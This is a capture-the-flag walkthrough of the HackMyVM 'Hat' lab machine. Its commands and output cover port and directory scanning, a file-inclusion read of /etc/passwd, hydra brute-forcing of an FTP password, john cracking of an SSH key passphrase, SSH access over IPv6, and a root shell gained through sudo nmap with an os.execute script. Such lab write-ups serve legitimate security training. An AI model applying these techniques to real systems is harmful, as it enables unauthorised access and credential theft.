日度归档:2021 年 10 月 13 日

HackMyVm Hat Walkthrough

HackMyVm Hat Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hat

Key points: IPv6

Nmap scan ports.

nmap -sV -sC -p- -Pn -oN ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.0012s latency).
 Not shown: 65532 closed ports
 PORT      STATE    SERVICE VERSION
 22/tcp    filtered ssh
 80/tcp    open     http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 65535/tcp open     ftp     pyftpdlib 1.5.4
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |  Connected to: 192.168.56.100:65535
 |  Waiting for username.
 |  TYPE: ASCII; STRUcture: File; MODE: Stream
 |  Data connection closed.
 |_End of status.

Scan port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.html (Status: 200) [Size: 10701]
/logs (Status: 301) [Size: 315] [--> http://192.168.56.100/logs/]
/php-scripts (Status: 301) [Size: 322] [--> http://192.168.56.100/php-scripts/]


Scan php-scripts, found file.php.

 ```bash
~ gobuster dir -u http://192.168.56.100/php-scripts -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o scripts.log
 /index.html           (Status: 200) [Size: 7]
 /file.php             (Status: 200) [Size: 0]

Fuzz the param of file.php.

```bash
~ wfuzz -u 'http://192.168.56.100/php-scripts/file.php?FUZZ=/etc/passwd'; -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0

ID Response Lines Word Chars Payload

000000713: 200 26 L 38 W 1404 Ch "6"


Get user name.

 ```bash
~ curl 'http://192.168.56.100/php-scripts/file.php?6=/etc/passwd'      
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin            
 ...
 cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash

Scan folder logs. Get ftp user name from vsftpd.log

```bash
~ gobuster dir -u http://192.168.56.100/logs -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,log -b 401,403,404,500
--wildcard -o logs.log
...

/index.html (Status: 200) [Size: 4]
/vsftpd.log (Status: 200) [Size: 1834]


Bruteforce password of ftp.

```bash
 ~ hydra -l ftp_s3cr3t -P /usr/share/wordlists/rock_ascii.txt -e nsr 192.168.56.100 -s 65535  ftp -t64 -F           ...
 [65535][ftp] host: 192.168.56.100   login: ftp_s3cr3t   password: cowboy

Get 2 files: note and id_rsa.

~ cat note                                                                              

 Hi,

 We have successfully secured some of our most critical protocols ... no more worrying!

 Sysadmin

Port 22 is filtered. We can not connect it directly, but it is open. So let's try IPV6.

Modify /etc/sysctl.conf to enable IPv6. inet6 means IPv6 is enabled.

```bash
~ cat /etc/sysctl.conf
...
net.ipv6.conf.all.disable_ipv6 = 0
net.ipv6.conf.default.disable_ipv6 = 0
net.ipv6.conf.lo.disable_ipv6 = 0
~ ifconfig
...
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.150 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::ff1:d602:48fd:2485 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:35:d5:69 txqueuelen 1000 (Ethernet)
...


Find machines in local link IPv6 network.

 ```bash
~ ping6 -c2 -n -I eth1 ff02::1  
 ping6: Warning: source address might be selected on device other than: eth1
 PING ff02::1(ff02::1) from :: eth1: 56 data bytes
 64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=1 ttl=64 time=0.033 ms
 64 bytes from fe80::a00:27ff:fe17:10a4%eth1: icmp_seq=1 ttl=64 time=0.615 ms
 64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=2 ttl=64 time=0.049 ms

Test if the machine can be visited from ipv6 address.

```bash
~ nmap -p- fe80::a00:27ff:fe17:10a4%eth1 -6
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-13 15:23 CST
Nmap scan report for fe80::a00:27ff:fe17:10a4
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
~ curl 'http://[fe80::a00:27ff:fe17:10a4%eth1]/index.html';
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">;
<html xmlns="http://www.w3.org/1999/xhtml">;
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
...


Decrypt id_rsa.

 ```bash
$ python2 /usr/share/john/ssh2john.py id_rsa  > crack.txt
 $ john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
 Using default input encoding: UTF-8
 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
 Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
 Cost 2 (iteration count) is 2 for all loaded hashes
 Will run 2 OpenMP threads
 Note: This format may emit false positives, so it will keep trying even after
 finding a possible candidate.
 Press 'q' or Ctrl-C to abort, almost any other key for status
 ilovemyself      (id_rsa)
 1g 0:00:00:11 46.01% (ETA: 20:23:54) 0.09082g/s 607973p/s 607973c/s 607973C/s katim03..katilsimbu_1
 Session aborted

Login ssh through ipv6.

```bash
~ ssh cromiphi@fe80::a00:27ff:fe17:10a4%eth1 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux Hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth: file /home/cromiphi/.Xauthority does not exist
cromiphi@Hat:~$


Check sudo -l.

 ```bash
cromiphi@Hat:~$ sudo -l
 Matching Defaults entries for cromiphi on Hat:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User cromiphi may run the following commands on Hat:
     (root) NOPASSWD: /usr/bin/nmap

Get root.

```bash
cromiphi@Hat:~$ echo 'os.execute("/bin/bash -i")' > exp
cromiphi@Hat:~$ sudo nmap --script=exp
Starting Nmap 7.70 ( https://nmap.org ) at 2021-10-13 10:38 CEST
NSE: Warning: Loading 'exp' -- the recommended file extension is '.nse'.
root@Hat:/home/cromiphi# uid=0(root) gid=0(root) grupos=0(root)
Hat